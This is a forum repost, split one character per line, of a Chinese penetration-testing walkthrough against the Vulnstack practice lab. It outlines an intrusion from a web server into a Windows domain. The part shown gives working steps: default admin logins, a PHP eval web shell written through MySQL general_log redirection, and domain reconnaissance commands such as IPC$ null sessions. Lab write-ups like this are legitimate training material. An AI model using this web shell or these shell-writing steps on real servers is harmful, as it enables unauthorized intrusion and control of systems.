论坛
BBS
空间测绘
发表
发布文章
提问答疑
搜索
您还未登录
登录后即可体验更多功能
立即登录
我的收藏
提问答疑
我要投稿
渗透测试
[18538] 2021-03-10_实战|记一次基础的内网Vulnstack靶机渗透一
文档创建者:
s7ckTeam
浏览次数:
2
最后更新:
2025-01-18
渗透测试
2 人阅读
|
0 人回复
s7ckTeam
s7ckTeam
当前离线
积分
-56
6万
主题
-6万
回帖
-56
积分
管理员
积分
-56
发消息
2021-03-10_实战|记一次基础的内网Vulnstack靶机渗透一
实
战
|
记
一
次
基
础
的
内
网
V
u
l
n
s
t
a
c
k
靶
机
渗
透
一
W
H
O
A
M
I
@
D
L
&
S
H
A
C
K
学
习
呀
2
0
2
1
-
0
3
-
1
0
i
m
g
靶
场
地
址
与
介
绍
:
h
t
t
p
:
/
/
v
u
l
n
s
t
a
c
k
.
q
i
y
u
a
n
x
u
e
t
a
n
g
.
n
e
t
/
v
u
l
n
/
d
e
t
a
i
l
/
2
/
漏
洞
利
用
1
.
漏
洞
搜
索
与
利
用
2
.
后
台
G
e
t
s
h
e
l
l
上
传
技
巧
3
.
系
统
信
息
收
集
4
.
主
机
密
码
收
集
内
网
搜
集
1
.
内
网
-
-
继
续
信
息
收
集
2
.
内
网
攻
击
姿
势
-
-
信
息
泄
露
3
.
内
网
攻
击
姿
势
-
M
S
0
8
-
0
6
7
4
.
内
网
攻
击
姿
势
-
S
M
B
远
程
桌
面
口
令
猜
测
5
.
内
网
攻
击
姿
势
-
O
r
a
c
l
e
数
据
库
T
N
S
服
务
漏
洞
6
.
内
网
攻
击
姿
势
-
R
P
C
D
C
O
M
服
务
漏
洞
横
向
移
动
1
.
内
网
其
它
主
机
端
口
-
文
件
读
取
2
.
内
网
其
它
主
机
端
口
-
r
e
d
i
s
3
.
内
网
其
它
主
机
端
口
-
r
e
d
i
s
G
e
t
s
h
e
l
l
4
.
内
网
其
它
主
机
端
口
-
M
y
S
Q
L
数
据
库
5
.
内
网
其
它
主
机
端
口
-
M
y
S
Q
L
提
权
构
建
通
道
内
网
其
它
主
机
端
口
-
代
理
转
发
持
久
控
制
1
.
域
渗
透
-
域
成
员
信
息
收
集
2
.
域
渗
透
-
基
础
服
务
弱
口
令
探
测
及
深
度
利
用
之
p
o
w
e
r
s
h
e
l
l
3
.
域
渗
透
-
横
向
移
动
[
w
m
i
利
用
]
4
.
域
渗
透
-
C
2
命
令
执
行
5
.
域
渗
透
-
利
用
D
o
m
a
i
n
F
r
o
n
t
i
n
g
实
现
对
b
e
a
c
o
n
的
深
度
隐
藏
6
.
域
渗
透
-
域
控
实
现
与
利
用
痕
迹
清
理
一
下
是
整
个
靶
场
拓
扑
结
构
:
i
m
g
W
e
b
服
务
器
:
W
i
n
d
o
w
s
7
(
内
配
有
p
h
p
s
t
u
d
y
w
e
b
环
境
)
模
拟
外
网
i
p
:
1
9
2
.
1
6
8
.
1
6
1
.
1
2
9
内
网
i
p
:
1
9
2
.
1
6
8
.
5
2
.
1
4
3
域
内
主
机
:
W
i
n
2
K
3
M
e
t
a
s
p
l
o
i
t
a
b
l
e
内
网
i
p
:
1
9
2
.
1
6
8
.
5
2
.
1
4
1
域
控
:
W
i
n
d
o
w
s
2
0
0
8
内
网
i
p
:
1
9
2
.
1
6
8
.
5
2
.
1
3
8
以
上
内
网
无
法
与
外
网
通
信
,
只
有
w
i
n
7
可
以
连
通
内
外
网
。
下
面
我
们
开
始
实
战
!
!
!
外
网
初
探
外
网
初
探
访
问
w
e
b
服
务
器
w
i
n
7
的
模
拟
外
网
i
p
—
—
1
9
2
.
1
6
8
.
1
6
1
.
1
2
9
i
m
g
是
w
e
b
一
个
站
点
,
并
且
在
右
边
“
公
告
信
息
”
处
泄
露
了
后
台
地
址
—
—
,
我
们
登
录
后
台
,
从
网
上
查
得
y
x
c
m
s
的
后
台
默
认
密
码
后
登
陆
:
i
m
g
/
i
n
d
e
x
.
p
h
p
?
r
=
a
d
m
i
n
i
m
g
登
陆
成
功
发
现
在
前
台
模
板
功
能
里
面
可
以
直
接
编
辑
p
h
p
文
件
,
我
们
一
可
以
直
接
写
入
w
e
b
s
h
e
l
l
并
连
接
i
m
g
我
们
在
a
c
o
m
m
e
n
t
.
p
h
p
中
写
入
i
m
g
保
存
后
,
我
们
接
下
来
就
要
想
办
法
找
到
这
个
a
c
o
m
m
e
n
t
.
p
h
p
所
在
的
目
录
了
,
我
们
扫
描
一
下
后
台
i
m
g
发
现
好
多
目
录
,
这
里
我
们
发
现
这
个
c
m
s
存
在
目
录
遍
历
漏
洞
:
i
m
g
这
个
时
候
只
要
浏
览
找
出
刚
刚
修
改
过
的
页
面
就
可
以
使
用
s
h
e
l
l
连
接
器
连
接
了
。
这
里
还
有
一
个
方
法
就
是
我
们
发
现
了
这
个
w
e
b
服
务
器
上
面
有
p
h
p
m
y
a
d
m
i
n
,
那
么
我
们
可
以
登
陆
进
去
,
这
里
是
靶
机
,
自
然
就
是
弱
密
码
了
(
r
o
o
t
/
r
o
o
t
)
:
i
m
g
p
h
p
m
y
a
d
m
i
n
后
台
g
e
t
s
h
e
l
l
的
常
用
手
段
有
以
下
几
种
方
式
:
1
、
s
e
l
e
c
t
i
n
t
o
o
u
t
f
i
l
e
直
接
写
入
2
、
开
启
全
局
日
志
g
e
t
s
h
e
l
l
3
、
使
用
慢
查
询
日
志
g
e
t
s
e
h
l
l
4
、
使
用
错
误
日
志
g
e
t
s
h
e
l
l
5
、
利
用
p
h
p
m
y
a
d
m
i
n
4
.
8
.
x
本
地
文
件
包
含
漏
洞
g
e
t
s
h
e
l
l
执
行
以
下
s
q
l
语
句
i
m
g
发
现
没
有
写
入
权
限
,
无
法
用
s
e
l
e
c
t
i
n
t
o
o
u
t
f
i
l
e
方
法
写
入
s
h
e
l
l
。
我
们
再
来
看
一
下
第
二
种
方
法
,
利
用
全
局
变
量
g
e
n
e
r
a
l
_
l
o
g
去
g
e
t
s
h
e
l
l
i
m
g
我
们
将
全
局
日
志
开
启
并
将
保
存
日
志
的
目
录
设
为
w
e
b
目
录
设
置
成
功
i
m
g
此
时
执
行
如
下
语
句
即
可
写
入
w
e
b
s
h
e
l
l
到
h
a
c
k
.
p
h
p
中
s
h
o
w
v
a
r
i
a
b
l
e
s
l
i
k
e
'
%
s
e
c
u
r
e
%
'
;
s
e
t
g
l
o
b
a
l
g
e
n
e
r
a
l
_
l
o
g
=
o
n
;
#
开
启
日
志
s
e
t
g
l
o
b
a
l
g
e
n
e
r
a
l
_
l
o
g
_
f
i
l
e
=
'
C
:
/
p
h
p
S
t
u
d
y
/
W
W
W
/
y
x
c
m
s
/
h
a
c
k
.
p
h
p
'
;
#
设
置
日
志
位
置
为
网
站
目
录
s
e
l
e
c
t
'
<
?
p
h
p
e
v
a
l
(
$
_
P
O
S
T
[
w
h
o
a
m
i
]
)
;
?
>
'
i
m
g
用
蚁
剑
连
接
即
可
i
m
g
杀
入
内
网
杀
入
内
网
我
们
发
现
我
们
刚
刚
拿
到
的
s
h
e
l
l
是
个
管
理
员
的
s
h
e
l
l
i
m
g
那
就
太
好
了
,
接
下
来
我
们
要
做
的
就
是
信
息
收
集
,
为
之
后
的
杀
入
内
网
做
准
备
初
步
收
集
i
p
c
o
n
f
i
g
/
a
l
l
#
查
看
本
机
i
p
,
所
在
域
r
o
u
t
e
p
r
i
n
t
#
打
印
路
由
信
息
n
e
t
v
i
e
w
#
查
看
局
域
网
内
其
他
主
机
名
a
r
p
-
a
#
查
看
a
r
p
缓
存
n
e
t
s
t
a
r
t
#
查
看
开
启
了
哪
些
服
务
n
e
t
s
h
a
r
e
#
查
看
开
启
了
哪
些
共
享
n
e
t
s
h
a
r
e
i
p
c
$
#
开
启
i
p
c
共
享
n
e
t
s
h
a
r
e
c
$
#
开
启
c
盘
共
享
n
e
t
u
s
e
1
9
2
.
1
6
8
.
x
x
.
x
x
i
p
c
$
"
"
/
u
s
e
r
:
"
"
#
与
1
9
2
.
1
6
8
.
x
x
.
x
x
建
立
空
连
接
n
e
t
u
s
e
1
9
2
.
1
6
8
.
x
x
.
x
x
c
$
"
密
码
"
/
u
s
e
r
:
"
用
户
名
"
#
建
立
c
盘
共
享
d
i
r
1
9
2
.
1
6
8
.
x
x
.
x
x
c
$
u
s
e
r
#
查
看
1
9
2
.
1
6
8
.
x
x
.
x
x
c
盘
u
s
e
r
目
录
下
的
文
件
n
e
t
c
o
n
f
i
g
W
o
r
k
s
t
a
t
i
o
n
#
查
看
计
算
机
名
、
全
名
、
用
户
名
、
系
统
版
本
、
工
作
站
、
域
、
登
录
域
n
e
t
u
s
e
r
#
查
看
本
机
用
户
列
表
n
e
t
u
s
e
r
/
d
o
m
a
i
n
#
查
看
域
用
户
n
e
t
l
o
c
a
l
g
r
o
u
p
a
d
m
i
n
i
s
t
r
a
t
o
r
s
#
查
看
本
地
管
理
员
组
(
通
常
会
有
域
用
户
)
n
e
t
v
i
e
w
/
d
o
m
a
i
n
#
查
看
有
几
个
域
n
e
t
u
s
e
r
用
户
名
/
d
o
m
a
i
n
#
获
取
指
定
域
用
户
的
信
息
n
e
t
g
r
o
u
p
/
d
o
m
a
i
n
#
查
看
域
里
面
的
工
作
组
,
查
看
把
用
户
分
了
多
少
组
(
只
能
在
域
控
上
操
作
)
n
e
t
g
r
o
u
p
组
名
/
d
o
m
a
i
n
#
查
看
域
中
某
工
作
组
n
e
t
g
r
o
u
p
"
d
o
m
a
i
n
a
d
m
i
n
s
"
/
d
o
m
a
i
n
#
查
看
域
管
理
员
的
名
字
n
e
t
g
r
o
u
p
"
d
o
m
a
i
n
c
o
m
p
u
t
e
r
s
"
/
d
o
m
a
i
n
#
查
看
域
中
的
其
他
主
机
名
n
e
t
g
r
o
u
p
"
d
o
a
m
i
n
c
o
n
t
r
o
l
l
e
r
s
"
/
d
o
m
a
i
n
#
查
看
域
控
制
器
(
可
能
有
多
台
)
回复
举报
上一个主题
下一个主题
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
本版积分规则
发表回复
!disable!!post_parseurl!
使用Markdown编辑器编辑
使用富文本编辑器编辑
回帖后跳转到最后一页
发表
渗透测试